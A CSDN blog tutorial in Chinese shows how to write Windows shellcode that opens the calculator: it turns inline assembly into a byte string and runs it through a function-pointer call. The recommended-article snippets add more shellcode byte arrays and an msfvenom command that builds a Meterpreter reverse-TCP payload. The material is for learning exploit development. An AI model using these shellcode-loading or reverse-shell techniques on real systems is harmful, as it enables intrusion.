c和汇编混合编程----shellcode----弹出计算器

最新推荐文章于 2024-09-19 22:33:02 发布
最新推荐文章于 2024-09-19 22:33:02 发布
阅读量1k 收藏 4
点赞数 1
分类专栏: shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41683305/article/details/104233418
版权
本文介绍如何使用C语言与汇编混合编程,在Windows环境下通过调用kernel32.dll实现弹出计算器窗口的过程。文章展示了具体的代码示例,包括如何加载库文件、设置断点进行反汇编以及如何将汇编代码转换为C语言中可使用的机器码。
摘要由CSDN通过智能技术生成

先用c和汇编混合编程成功弹出计算器(在VC++里运行)

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
	printf("begin\n");
    HINSTANCE libHandle;
	char *dll="kernel32.dll";
    libHandle=LoadLibrary(dll);


  {
	  sub esp,0x454
	  xor ebx,ebx
	  push ebx
	  mov eax,0x6578652e
	  push eax
	  mov eax,0x636c6163
	  push eax
	  mov eax,esp
	  push 5
	  push eax
	  call dword ptr [WinExec]
	  mov esp,0x450
	  
   }
	return 0;

}

设置断点,反汇编
在这里插入图片描述
将程序的反汇编复制到一个文本编辑器里,将上面汇编的机器码找出来
在这里插入图片描述
在机器码前面加上\x,放到一个字符数据里

char shellcode[]="\x81\xEC\x54\x04\x00\x00\x33\xDB\x53\xB8\x2E\x65\x78\x65\x50\xB8\x63\x61\x6C\x63\x50\x8B\xC4\x6A\x05\x50\xFF\x15\x14\xA2\x42\x00\xBC\x50\x04\x00\x00";

只要取汇编的机器码就行,c的不用管

将上面的程序改成

#include "stdio.h"
#include "windows.h"

char shellcode[]="\x81\xEC\x54\x04\x00\x00\x33\xDB\x53\xB8\x2E\x65\x78\x65\x50\xB8\x63\x61\x6C\x63\x50\x8B\xC4\x6A\x05\x50\xFF\x15\x14\xA2\x42\x00\xBC\x50\x04\x00\x00";
int main(int argc, char* argv[])
{
	printf("begin\n");
    HINSTANCE libHandle;
	char *dll="kernel32.dll";
    libHandle=LoadLibrary(dll);

	__asm
	{
	  lea eax,shellcode
	  call eax

	}
	return 0;

}

在运行,也能弹出计算器
在这里插入图片描述

p0inter
关注
专栏目录
rust-windows-shellcode:Rust的Windows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法...
shellcode2--弹出计算器
gclome的博客
02-18 2329
// 345.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include "stdio.h" #include "windows.h" char shellcode[]="\x66\x81\xEC\x54\x04\x33\xDB\x53\x68\x2E\x65\x78\x65\...
汇编语言编写shellcode实现弹窗计算器
yeanhoo的博客
04-04 1977
使用汇编语言编写shellcode,调用WinExec实现弹出计算器汇编代码如下: .386 .model flat,stdcall ; 代码区域 .code main: push ebp mov ebp,esp sub esp,20h; 开辟栈空间 ; 获取Kernel32基址 assume fs:nothing mov eax,[fs:30h]; peb结构所在地址 mov ...
Windows X64 弹计算器shellcode
最新发布
weixin_54005873的博客
09-19 454
[72, 129, 236, 0, 1, 0, 0, 101, 72, 139, 4, 37, 96, 0, 0, 0, 72, 139, 64, 24, 72, 139, 64, 48, 72, 139, 112, 16, 72, 139, 88, 64, 72, 139, 0, 129, 123, 12, 51, 0, 50, 0, 117, 236, 72, 139, 206, 72, 199, 194, 50, 116, 145, 12, 232, 192, 0, 0, 0, 76, 139, 2
Shellcode提取、加载与解析
莫慌的博客
03-06 2097
msf的shellcode 如何实现的
shellcode样本—弹出计算器
谈成(C/C++)
04-28 1853
该样本弹出计算器的原理为: 1)先加载MSVCRT.DLL。 2)再使用system()函数调用calc命令。 该shellcode脚本只在xp下通过实验,仅适合用来研究和验证漏洞。其的函数地址采用的都是固定地址。win7以上不适用。 该样本特点:没有任何0x00,可以参与字符串类溢出。比如strcpy等。 unsigned char shellcode2[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
栈溢出攻击之弹出计算器
Bonjour~
04-15 7798
一.系统栈溢出原理函数栈帧及寄存器在高级语言,当函数被调用时,系统栈会为这个函数开辟一个新的栈帧,并把它压入栈。这个栈帧的内存空间被它所属的函数独占,正常情况下是不会和别的函数共享的。当函数返回时,系统栈会弹出该函数所对应的栈帧。Win32系统提供两个特殊的寄存器用于标识位于系统栈顶端的栈帧: 1. ESP:栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的栈顶; 2.
go-shellcode:将Shellcode加载到新进程
02-06
使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444c:\windows\temp>sc.exe fce8820000006089e531c0648b...
Shellcode-Extractor:Python脚本从Linux可执行文件提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/二进制文件提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是免费软件:您可以根据自由软件...
cpp-DllToShellCode快速将Windows动态链接库转换成ShellCode
08-16
在IT领域,Windows操作系统的动态链接库(DLL)和ShellCode是两个重要的概念,它们在软件开发、逆向工程和安全研究都有广泛的应用。本文将深入探讨如何使用"cpp-DllToShellCode"工具将Windows DLL转换为...
cpp-使用纯CC编写的ShellCode生成框架
08-16
C/C++编译器生成的汇编代码接近底层,便于理解和优化ShellCode。 三、ShellCode生成框架 “cpp-使用纯CC编写的ShellCode生成框架”旨在提供一种工具,帮助开发者更方便地创建和管理ShellCode。这个框架可能包括以下...
cpp-在恶意软件分析过程快速调试shellcode
08-15
- **OllyDbg和IDA Pro**:这两款高级调试器提供了强大的反汇编和调试功能,特别适合shellcode分析。 - **插件增强**:如ollydbg的ollyice或IDA的IDAPython,可以扩展调试器的功能,提供更深入的分析。 总结来说,...
cpp-跨架构的Shellcode编译器
08-16
C++是一种通用、面向对象的编程语言,源自C语言,它提供了高级抽象和模板机制,允许开发人员编写高效且可重用的代码。在这个项目,C++被用来构建这个Shellcode编译器,因为它能提供足够的底层控制来处理不同架构的...
南开大学复习资料-计算机病毒分析.docx
12-16
分析shellcode是指对shellcode的反汇编和分析,了解其工作机制和行为。协助功能是指使用调试工具对程序进行调试和分析,了解其内部机理和行为。 计算机病毒分析的重要性是为了保护计算机系统和数据的安全。计算机...
dotnet-RunShellcode用于运行一些shellcode简单的NETGUI程序
08-14
3. **Marshaling**:如果shellcode包含非托管代码(例如,C或汇编),则可能需要使用.NET的marshaling服务将这些代码转换为.NET可以理解的形式。 4. **安全性与权限**:由于shellcode可能涉及敏感操作,程序需要...
南开大学复习资料-计算机病毒分析0001.docx
12-16
分析shellcode是指通过分析shellcode来检测和消除计算机病毒。OllyDbg是一种常用的调试工具,提供了多种机制来帮助分析shellcode,包括日志、监视、帮助和标注等。 使用WinDbg调试内核 WinDbg是一种调试工具,用于...
shellcode——1、采用硬编码弹出计算器
alwin_cx的博客
05-19 6581
一、shellcode介绍    用一句话给shellcode下个定义,那就是“一段可以执行特定功能的机器码”。二、实验环境及工具介绍实验环境:Windows XP SP3实验工具:OllyDbg、WinHex、LordPE三、编程思路     用C语言来描述其实就是两句:WinExec("calc.exe", 5); ExitProcess(0);     看到有些文章会在开头还加一句:Load...
windows下shellcode编写入门
热门推荐
x_nirvana的博客
03-31 1万+
本文简要介绍shellcode开发技术及其特点。理解这些概念可以有助于我们编写自己的shellcode。更进一步讲,你可以修改现有的漏洞利用代码来执行自己所需要的定制功能。
shellcode
m0_62207482的博客
02-09 614
在漏洞利用shellcode是不可或缺的部分,所以在网上有许多公开分享的 shellcode ,在不同平台上并不通用,需要选择适合的shellcode。这里推荐两个常 见公开的安全平台:一个为公开的漏洞库exploit-db(见公众号链接10-1),一个 为公开的Shell-strom库(见公众号链接10-2),如图10-1和图10-2所示。6)成功弹出计算器程序。5)运行后可以成功弹出计算器,如图10-3所示,但这还没有结束,如果目标 机器没有Python环境,shellcode便无法执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值